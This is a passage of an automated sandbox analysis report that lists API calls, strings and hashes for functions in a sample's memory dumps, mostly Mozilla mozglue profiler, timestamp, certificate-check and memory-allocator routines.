                                                                    • Part of subcall function 6C8C35A0: QueryPerformanceFrequency.KERNEL32(?), ref: 6C8C35FD
                                                                    • Part of subcall function 6C8C35A0: _strnicmp.API-MS-WIN-CRT-STRING-L1-1-0(?,GenuntelineI,0000000C), ref: 6C8C363F
                                                                    • Part of subcall function 6C8C35A0: GetSystemTimeAdjustment.KERNEL32(?,?,?), ref: 6C8C369F
                                                                    • Part of subcall function 6C8C35A0: __aulldiv.LIBCMT ref: 6C8C36E4
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8C309F
                                                                    • Part of subcall function 6C8E5B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5B85
                                                                    • Part of subcall function 6C8E5B50: EnterCriticalSection.KERNEL32(6C94F688,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5B90
                                                                    • Part of subcall function 6C8E5B50: LeaveCriticalSection.KERNEL32(6C94F688,?,?,?,6C8E56EE,?,00000001), ref: 6C8E5BD8
                                                                    • Part of subcall function 6C8E5B50: GetTickCount64.KERNEL32 ref: 6C8E5BE4
                                                                  • ?InitializeUptime@mozilla@@YAXXZ.MOZGLUE ref: 6C8C30BE
                                                                    • Part of subcall function 6C8C30F0: QueryUnbiasedInterruptTime.KERNEL32 ref: 6C8C3127
                                                                    • Part of subcall function 6C8C30F0: __aulldiv.LIBCMT ref: 6C8C3140
                                                                    • Part of subcall function 6C8FAB2A: __onexit.LIBCMT ref: 6C8FAB30
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: Time$CriticalQuerySection$InitializePerformanceStamp@mozilla@@__aulldiv$AdjustmentCountCount64CounterEnterFrequencyInterruptLeaveNow@SpinStartup@SystemTickUnbiasedUptime@mozilla@@V12@___onexit_strnicmpgetenv
                                                                  • String ID:
                                                                  • API String ID: 4291168024-0
                                                                  • Opcode ID: c4fe9bfef9efbcc5a50cdfdcd911470c488ec53f4ead7485e0796ce8f215d1ca
                                                                  • Instruction ID: b2d2da47271c032ade3c6403765c26ba8b9f1b03b0ee17342696eebe54e8b59b
                                                                  • Opcode Fuzzy Hash: c4fe9bfef9efbcc5a50cdfdcd911470c488ec53f4ead7485e0796ce8f215d1ca
                                                                  • Instruction Fuzzy Hash: F9F0F922E2874D96CB20FF7899411E6B370AF6B21CF609729E85863511FB20A5D88396

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 118 913b8c-913b97 119 913ba0-913ba3 118->119 120 913b99-913b9e 118->120 121 913baa-913bbe VirtualAlloc 119->121 122 913ba5 119->122 120->121 122->121
                                                                  APIs
                                                                  • VirtualAlloc.KERNEL32(?,?,?,?), ref: 00913BB7
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2290413954.0000000000906000.00000040.00000001.01000000.00000003.sdmp, Offset: 007BC000, based on PE: true
                                                                  • Associated: 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_580000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: AllocVirtual
                                                                  • String ID:
                                                                  • API String ID: 4275171209-0
                                                                  • Opcode ID: 27fe97eb68e8c0148d149f2c868e02da1874c3b5056f721d81f05faae7391de2
                                                                  • Instruction ID: 54ef56e680a9a5d5092bede84c81b56d76e26deb21e93158b6b0615138209d9c
                                                                  • Opcode Fuzzy Hash: 27fe97eb68e8c0148d149f2c868e02da1874c3b5056f721d81f05faae7391de2
                                                                  • Instruction Fuzzy Hash: F2E0EC7536850C9BDB50CE4CD844BAB33ADE798310F14C411F509D7204D234ED509761

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 295 8b2e84-8b2e93 call 7c2d28 298 8b2e98-8b2e9d call 7cba50 295->298 300 8b2ea2-8b2ea5 298->300 301 8b2eab-8b2eb9 300->301 302 8b2f2e-8b2f31 300->302 305 8b2ebb-8b2ec9 call 81df44 301->305 306 8b2f2c 301->306 303 8b2f3f-8b2f41 302->303 304 8b2f33-8b2f3d call 8b2c64 302->304 303->298 304->303 305->306 311 8b2ecb-8b2eed call 7c2d28 305->311 306->302 314 8b2eef-8b2f05 311->314 315 8b2f07-8b2f15 311->315 314->315 315->306 316 8b2f17-8b2f27 call 8b3640 315->316 316->306
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2290413954.00000000007BC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                  • Associated: 00000000.00000002.2290402168.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000581000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000005C8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000626000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000006CA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000007A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000007B7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.00000000008EC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000906000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000951000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000995000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2290413954.0000000000F47000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_580000_wqmnYoVbHr.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 70ead10f2e7e3eb4e8b22b5ef2ab51738a6c51ea7146d06d7296df0b3f53f0df
                                                                  • Instruction ID: 20f20baf308e60a3029114fe3ec07b36bed831b612469dcf98eeee06f5252923
                                                                  • Opcode Fuzzy Hash: 70ead10f2e7e3eb4e8b22b5ef2ab51738a6c51ea7146d06d7296df0b3f53f0df
                                                                  • Instruction Fuzzy Hash: B1118F307001018BE356EF69E8C5EA9B3A7FB8A344B108376E405CB3A5CF74AC82CB54
                                                                  APIs
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING), ref: 6C8D5492
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C8D54A8
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C8D54BE
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D54DB
                                                                    • Part of subcall function 6C8FAB3F: EnterCriticalSection.KERNEL32(6C94E370,?,?,6C8C3527,6C94F6CC,?,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB49
                                                                    • Part of subcall function 6C8FAB3F: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C3527,6C94F6CC,?,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FAB7C
                                                                    • Part of subcall function 6C8FCBE8: GetCurrentProcess.KERNEL32(?,6C8C31A7), ref: 6C8FCBF1
                                                                    • Part of subcall function 6C8FCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C8C31A7), ref: 6C8FCBFA
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D54F9
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_HELP), ref: 6C8D5516
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D556A
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8D5577
                                                                  • moz_xmalloc.MOZGLUE(00000070), ref: 6C8D5585
                                                                  • ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(00000000,00000001), ref: 6C8D5590
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP,?,00000001), ref: 6C8D55E6
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C8D5606
                                                                  • free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6C8D5616
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D563E
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8D5646
                                                                  • exit.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000), ref: 6C8D567C
                                                                  • free.MOZGLUE(?), ref: 6C8D56AE
                                                                    • Part of subcall function 6C8E5E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C8E5EDB
                                                                    • Part of subcall function 6C8E5E90: memset.VCRUNTIME140(6C927765,000000E5,55CCCCCC), ref: 6C8E5F27
                                                                    • Part of subcall function 6C8E5E90: LeaveCriticalSection.KERNEL32(?), ref: 6C8E5FB2
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_NO_BASE), ref: 6C8D56E8
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C8D5707
                                                                  • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,00000001), ref: 6C8D570F
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_ENTRIES), ref: 6C8D5729
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_DURATION), ref: 6C8D574E
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_INTERVAL), ref: 6C8D576B
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES_BITFIELD), ref: 6C8D5796
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FEATURES), ref: 6C8D57B3
                                                                  • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_PROFILER_STARTUP_FILTERS), ref: 6C8D57CA
                                                                  Strings
                                                                  • MOZ_PROFILER_STARTUP, xrefs: 6C8D55E1
                                                                  • MOZ_PROFILER_STARTUP_DURATION, xrefs: 6C8D5749
                                                                  • - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s, xrefs: 6C8D5D1C
                                                                  • MOZ_PROFILER_STARTUP_FEATURES_BITFIELD, xrefs: 6C8D5791
                                                                  • MOZ_PROFILER_STARTUP_ENTRIES, xrefs: 6C8D5724
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d, xrefs: 6C8D5AC9
                                                                  • MOZ_BASE_PROFILER_HELP, xrefs: 6C8D5511
                                                                  • MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C8D548D
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s, xrefs: 6C8D5B38
                                                                  • MOZ_PROFILER_STARTUP_FILTERS, xrefs: 6C8D57C5
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP is set, xrefs: 6C8D5717
                                                                  • - MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s, xrefs: 6C8D5D01
                                                                  • GeckoMain, xrefs: 6C8D5554, 6C8D55D5
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB, xrefs: 6C8D5D2B
                                                                  • MOZ_PROFILER_STARTUP_FEATURES, xrefs: 6C8D57AE
                                                                  • - MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s, xrefs: 6C8D5D24
                                                                  • [I %d/%d] -> This process is excluded and won't be profiled, xrefs: 6C8D5BBE
                                                                  • MOZ_PROFILER_STARTUP_NO_BASE, xrefs: 6C8D56E3
                                                                  • MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C8D54A3
                                                                  • MOZ_BASE_PROFILER_LOGGING, xrefs: 6C8D54B9
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u, xrefs: 6C8D5C56
                                                                  • - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s, xrefs: 6C8D5CF9
                                                                  • MOZ_PROFILER_STARTUP_INTERVAL, xrefs: 6C8D5766
                                                                  • [I %d/%d] profiler_init, xrefs: 6C8D564E
                                                                  • [I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d, xrefs: 6C8D584E
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: getenv$CriticalSection$Current$Thread$EnterLeaveProcess$ExclusiveLock_getpidfree$AcquireCreation@Init_thread_footerReleaseStamp@mozilla@@TerminateTimeV12@exitmemsetmoz_xmalloc
                                                                  • String ID: - MOZ_PROFILER_STARTUP_DURATION not a valid float: %s$- MOZ_PROFILER_STARTUP_ENTRIES not a valid integer: %s$- MOZ_PROFILER_STARTUP_ENTRIES unit must be one of the following: KB, KiB, MB, MiB, GB, GiB$- MOZ_PROFILER_STARTUP_FEATURES_BITFIELD not a valid integer: %s$- MOZ_PROFILER_STARTUP_INTERVAL not a valid float: %s$GeckoMain$MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_HELP$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING$MOZ_PROFILER_STARTUP$MOZ_PROFILER_STARTUP_DURATION$MOZ_PROFILER_STARTUP_ENTRIES$MOZ_PROFILER_STARTUP_FEATURES$MOZ_PROFILER_STARTUP_FEATURES_BITFIELD$MOZ_PROFILER_STARTUP_FILTERS$MOZ_PROFILER_STARTUP_INTERVAL$MOZ_PROFILER_STARTUP_NO_BASE$[I %d/%d] -> This process is excluded and won't be profiled$[I %d/%d] - MOZ_PROFILER_STARTUP is set$[I %d/%d] - MOZ_PROFILER_STARTUP_ENTRIES = %u$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FEATURES_BITFIELD = %d$[I %d/%d] - MOZ_PROFILER_STARTUP_FILTERS = %s$[I %d/%d] profiler_init
                                                                  • API String ID: 3686969729-1266492768
                                                                  • Opcode ID: 6fb7fd62e78659b23a3ca2c1a43f135fc0706da54103bc1c970f51c1951258cf
                                                                  • Instruction ID: 42dde690fa75498e175291197d4714ba001cfa8349f36ab4af29f445e9eb8087
                                                                  • Opcode Fuzzy Hash: 6fb7fd62e78659b23a3ca2c1a43f135fc0706da54103bc1c970f51c1951258cf
                                                                  • Instruction Fuzzy Hash: 162218F1A087009FDB20AF74C55465A77B4EF9734CF26892AE84987B41EB30E458CB53
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90B845
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000), ref: 6C90B852
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90B884
                                                                  • InitializeConditionVariable.KERNEL32(?), ref: 6C90B8D2
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?), ref: 6C90B9FD
                                                                  • GetCurrentThreadId.KERNEL32 ref: 6C90BA05
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94F4B8,?,?,00000000), ref: 6C90BA12
                                                                  • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,00000000), ref: 6C90BA27
                                                                  • ReleaseSRWLockExclusive.KERNEL32(6C94F4B8), ref: 6C90BA4B
                                                                  • free.MOZGLUE(?), ref: 6C90C9C7
                                                                  • free.MOZGLUE(?), ref: 6C90C9DC
                                                                  Strings
                                                                  • [I %d/%d] Stack sample too big for local storage, needed %u bytes, xrefs: 6C90C7DA
                                                                  • [I %d/%d] Stack sample too big for profiler storage, needed %u bytes, xrefs: 6C90C878
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: ExclusiveLock$AcquireCurrentNow@ReleaseStamp@mozilla@@ThreadTimeV12@_free$ConditionInitializeVariable
                                                                  • String ID: [I %d/%d] Stack sample too big for local storage, needed %u bytes$[I %d/%d] Stack sample too big for profiler storage, needed %u bytes
                                                                  • API String ID: 656605770-2789026554
                                                                  • Opcode ID: 3861a68f0548520805bef1b73249f9321f2ea83439b13bd543051b57119ab356
                                                                  • Instruction ID: 4c22b9977f5a8b792f02124c0162eb04c9b7452b5c6329f99347d42145d603c0
                                                                  • Opcode Fuzzy Hash: 3861a68f0548520805bef1b73249f9321f2ea83439b13bd543051b57119ab356
                                                                  • Instruction Fuzzy Hash: 5CA29B72A087808FC725DF28C49079FB7F5BFC9318F148A2DE89997750DB7099098B92
                                                                  APIs
                                                                  • CryptQueryObject.CRYPT32(00000001,?,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C8D6CCC
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C8D6D11
                                                                  • moz_xmalloc.MOZGLUE(0000000C), ref: 6C8D6D26
                                                                    • Part of subcall function 6C8DCA10: malloc.MOZGLUE(?), ref: 6C8DCA26
                                                                  • memset.VCRUNTIME140(00000000,00000000,0000000C), ref: 6C8D6D35
                                                                  • CryptMsgGetParam.CRYPT32(00000000,00000007,00000000,00000000,0000000C), ref: 6C8D6D53
                                                                  • CertFindCertificateInStore.CRYPT32(00000000,00010001,00000000,000B0000,00000000,00000000), ref: 6C8D6D73
                                                                  • free.MOZGLUE(00000000), ref: 6C8D6D80
                                                                  • CertGetNameStringW.CRYPT32 ref: 6C8D6DC0
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C8D6DDC
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C8D6DEB
                                                                  • CertGetNameStringW.CRYPT32(00000000,00000004,00000000,00000000,00000000,00000000), ref: 6C8D6DFF
                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 6C8D6E10
                                                                  • CryptMsgClose.CRYPT32(00000000), ref: 6C8D6E27
                                                                  • CertCloseStore.CRYPT32(00000000,00000000), ref: 6C8D6E34
                                                                  • CreateFileW.KERNEL32 ref: 6C8D6EF9
                                                                  • moz_xmalloc.MOZGLUE(00000000), ref: 6C8D6F7D
                                                                  • memset.VCRUNTIME140(00000000,00000000,00000000), ref: 6C8D6F8C
                                                                  • memset.VCRUNTIME140(00000002,00000000,00000208), ref: 6C8D709D
                                                                  • CryptQueryObject.CRYPT32(00000001,00000002,00000400,00000002,00000000,?,?,?,?,?,00000000), ref: 6C8D7103
                                                                  • free.MOZGLUE(00000000), ref: 6C8D7153
                                                                  • CloseHandle.KERNEL32(?), ref: 6C8D7176
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D7209
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D723A
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D726B
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D729C
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D72DC
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8D730D
                                                                  • memset.VCRUNTIME140(?,00000000,00000110), ref: 6C8D73C2
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D73F3
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D73FF
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D7406
                                                                  • VerSetConditionMask.NTDLL ref: 6C8D740D
                                                                  • VerifyVersionInfoW.KERNEL32(?,00000033,00000000), ref: 6C8D741A
                                                                  • moz_xmalloc.MOZGLUE(?), ref: 6C8D755A
                                                                  • memset.VCRUNTIME140(00000000,00000000,?), ref: 6C8D7568
                                                                  • CryptBinaryToStringW.CRYPT32(00000000,00000000,4000000C,00000000,?), ref: 6C8D7585
                                                                  • _wcsupr_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C8D7598
                                                                  • free.MOZGLUE(00000000), ref: 6C8D75AC
                                                                    • Part of subcall function 6C8FAB89: EnterCriticalSection.KERNEL32(6C94E370,?,?,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284), ref: 6C8FAB94
                                                                    • Part of subcall function 6C8FAB89: LeaveCriticalSection.KERNEL32(6C94E370,?,6C8C34DE,6C94F6CC,?,?,?,?,?,?,?,6C8C3284,?,?,6C8E56F6), ref: 6C8FABD1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_0_2_6c8c0000_wqmnYoVbHr.jbxd
                                                                  Similarity
                                                                  • API ID: CryptInit_thread_footermemset$Cert$ConditionMaskmoz_xmalloc$CloseStringfree$CertificateCriticalNameObjectParamQuerySectionStore$BinaryContextCreateEnterFileFindFreeHandleInfoLeaveVerifyVersion_wcsupr_smalloc
                                                                  • String ID: ($CryptCATAdminReleaseCatalogContext$SHA256$wintrust.dll
                                                                  • API String ID: 3256780453-3980470659
                                                                  • Opcode ID: 32d10922dc00053715caa975f0172fb008abbe271a2d01ad28d07289657cfa76
                                                                  • Instruction ID: 4aad0d243e1058a30401407bd1d61b92933d2d9ba12b446326a589493c04d991
                                                                  • Opcode Fuzzy Hash: 32d10922dc00053715caa975f0172fb008abbe271a2d01ad28d07289657cfa76
                                                                  • Instruction Fuzzy Hash: 2952D7B1A042199BEB31DF24CD84BAA77B8EB4570CF1189A9E5099B740DB30BF85CF51
                                                                  APIs
                                                                  • EnterCriticalSection.KERNEL32(6C94E7DC), ref: 6C8F7019
                                                                  • LeaveCriticalSection.KERNEL32(6C94E7DC), ref: 6C8F7061
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8F71A4
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8F721D
                                                                  • memcpy.VCRUNTIME140(?,?,?), ref: 6C8F723E
                                                                  • EnterCriticalSection.KERNEL32(?), ref: 6C8F726C
                                                                  • memset.VCRUNTIME140(?,000000E5,000000FF), ref: 6C8F72B2
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8F733F
                                                                  • EnterCriticalSection.KERNEL32(0000000C), ref: 6C8F73E8
                                                                  • LeaveCriticalSection.KERNEL32(?), ref: 6C8F961C
                                                                  • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8F9622
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8F9642
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8F964F
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8F96CE
                                                                  • ?RandomUint64@mozilla@@YA?AV?$Maybe@_K@1@XZ.MOZGLUE(?), ref: 6C8F96DB
                                                                  • AcquireSRWLockExclusive.KERNEL32(6C94E804), ref: 6C8F9747
                                                                  • GetSystemInfo.KERNEL32(?), ref: 6C8F9792
                                                                  • __Init_thread_footer.LIBCMT ref: 6C8F97A5
                                                                  • GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C94E810,00000040), ref: 6C8F97CF
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E7B8,00001388), ref: 6C8F9838
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E744,00001388), ref: 6C8F984E
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E784,00001388), ref: 6C8F9874
                                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(6C94E7DC,00001388), ref: 6C8F9895
                                                                  Strings
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x20U)) == 0) (Freeing in decommitted page.), xrefs: 6C8F99A8
                                                                  • MOZ_RELEASE_ASSERT((mapelm->bits & ((size_t)0x01U)) != 0) (Double-free?), xrefs: 6C8F99BD
                                                                  • Compile-time page size does not divide the runtime one., xrefs: 6C8F9B38
                                                                  • MOZ_RELEASE_ASSERT(mNode), xrefs: 6C8F9933, 6C8F9A33, 6C8F9A4E
                                                                  • MOZ_RELEASE_ASSERT((run->mRegionsMask[elm] & (1U << bit)) == 0) (Double-free?), xrefs: 6C8F99D2
                                                                  • <jemalloc>, xrefs: 6C8F9B33, 6C8F9BE3
                                                                  • MOZ_CRASH(), xrefs: 6C8F9B42
                                                                  • : (malloc) Unsupported character in malloc options: ', xrefs: 6C8F9BF4
                                                                  • MALLOC_OPTIONS, xrefs: 6C8F97CA
                                                                  • MOZ_RELEASE_ASSERT(!aArena || arena == aArena), xrefs: 6C8F9993
                                                                  Memory Dump Source
                                                                  • Source File: 00000000.00000002.2323500309.000000006C8C1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C8C0000, based on PE: true
                                                                  • Associated: 00000000.00000002.2323480663.000000006C8C0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323556136.000000006C93D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323578136.000000006C94E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                  • Associated: 00000000.00000002.2323595874.000000006C952000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
